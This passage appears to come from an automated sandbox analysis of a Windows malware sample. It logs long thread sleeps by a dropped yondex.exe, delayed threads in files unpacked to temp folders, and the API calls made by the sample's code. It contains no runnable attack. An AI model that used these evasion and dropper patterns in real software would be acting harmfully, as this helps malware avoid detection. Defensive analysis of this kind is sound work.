                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583204s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -583047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582645s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -582070s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581490s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581344s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -581086s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580945s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580526s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580400s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580258s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -580109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579708s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579424s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579297s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579160s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -579005s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578868s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578731s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578449s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578322s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578186s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -578060s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577934s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577804s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577659s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577515s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577368s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -577078s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576960s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576651s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576499s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576344s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576187s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -576054s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575634s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575487s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -575078s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574951s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574812s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574681s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574394s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574258s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -574078s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573920s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573646s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573510s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573362s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -573064s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572791s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572659s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572377s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572236s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -572107s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571980s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571712s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571422s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571285s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571154s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -571026s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570760s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570616s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570471s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570182s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -570047s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569891s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569750s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569594s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569464s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -569062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568756s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568620s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568198s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -568071s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567937s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567801s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567668s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567404s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567275s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567140s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -567000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -566844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -566687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -566553s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -566410s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -566265s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -566109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565997s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565866s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565718s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565588s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565462s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565342s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -565084s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -564946s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -564812s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -564686s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -564547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -564406s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -564277s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -564140s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -563984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -563844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -563703s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -563515s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -563375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -563250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -563109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -562966s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -562836s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -562656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -562500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -562359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -562211s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -562079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -561935s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -561797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -561640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -561493s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -561348s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -561210s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -561062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -560930s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -560804s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -560625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -560453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -560305s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -560140s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -560015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -559858s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -559727s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -559578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -559462s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -559321s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -559163s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -559015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -558889s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -558757s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -558594s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -558451s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -558315s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -558166s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -558015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -557875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -557742s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -557605s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -557471s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -557328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -557203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -557062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -556943s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -556811s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -556684s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -556500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -556354s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -556219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -556062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -555931s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -555797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -555686s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -555529s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -555364s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -555219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8188Thread sleep count: 2391 > 30
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep count: 486 > 30
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -555085s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554874s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -554000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -553890s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65594B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65594B190
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6559340BC
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65595FCA0 FindFirstFileExA,0_2_00007FF65595FCA0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4A40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7AB4A40BC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4BB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_0